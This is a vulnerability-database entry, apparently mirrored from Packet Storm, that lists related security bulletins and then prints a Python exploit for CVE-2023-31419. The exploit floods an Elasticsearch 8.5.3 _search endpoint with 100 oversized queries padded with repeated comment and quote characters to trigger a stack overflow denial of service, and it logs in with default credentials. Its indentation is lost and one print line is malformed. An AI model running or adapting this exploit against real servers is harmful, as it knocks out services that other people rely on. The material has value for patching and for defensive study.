Elasticsearch 8.5.3 Stack Overflow

🗓️ 22 Sep 2023 00:00:00Reported by Touhami KasbaouiType

packetstorm🔗 packetstormsecurity.com👁 450 Views

Elasticsearch 8.5.3 Stack Overflow Exploi

Reporter	Title	Published	Views	Family All 32
IBM Security Bulletins	Security Bulletin: Multiple security vulnerabilities are addressed with IBM Cloud Pak for Business Automation iFixes for October 2023	26 Mar 202504:03	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Elasticsearch affect watsonx.data	3 Sep 202421:02	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Elasticsearch affect watsonx.data	16 Sep 202417:08	–	ibm
IBM Security Bulletins	Security Bulletin: Netcool Operations Insights 1.6.13 addresses multiple security vulnerabilities.	31 Jul 202411:01	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Watson Assistant for IBM Cloud Pak for Data is vulnerable multiple Elasticsearch vulnerabilities.	5 Feb 202420:08	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Datapower Operations Dashboard is vulnerable to a denial of service CVE-2023-31419	11 Mar 202414:51	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in elasticsearch-7.10.2.jar	5 Sep 202421:54	–	ibm
0day.today	Elasticsearch 8.5.3 Stack Overflow Exploit	26 Sep 202300:00	–	zdt
0day.today	Elasticsearch - StackOverflow DoS Exploit	11 Feb 202400:00	–	zdt
BDU FSTEC	The vulnerability of the _search component of the Elasticsearch search engine allows a hacker to trigger a service failure.	21 Sep 202300:00	–	bdu_fstec

`# Exploit Author: TOUHAMI KASBAOUI  
# Vendor Homepage: https://elastic.co/  
# Version: 8.5.3 / OpenSearch  
# Tested on: Ubuntu 20.04 LTS  
# CVE : CVE-2023-31419  
# Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419  
  
import requests  
import random  
import string  
  
es_url = 'http://localhost:9200' # Replace with your Elasticsearch server URL  
index_name = '*'  
  
payload = "/*" * 10000 + "\\" +"'" * 999  
  
verify_ssl = False  
  
username = 'elastic'  
password = 'changeme'  
  
auth = (username, password)  
  
num_queries = 100  
  
for _ in range(num_queries):  
symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))  
search_query = {  
"query": {  
"match": {  
"message": (symbols * 9000) + payload  
}  
}  
}  
  
print(f"Query {_ + 1} - Search Query:")  
  
search_endpoint = f'{es_url}/{index_name}/_search'  
response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)  
  
if response.status_code == 200:  
search_results = response.json()  
  
print(f"Query {_ + 1} - Response:")  
print(search_results)  
  
total_hits = search_results['hits']['total']['value']  
print(f"Query {_ + 1}: Total hits: {total_hits}")  
  
for hit in search_results['hits']['hits']:  
source_data = hit['_source']  
print("Payload result: {search_results}")  
else:  
print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")  
`

22 Sep 2023 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.35125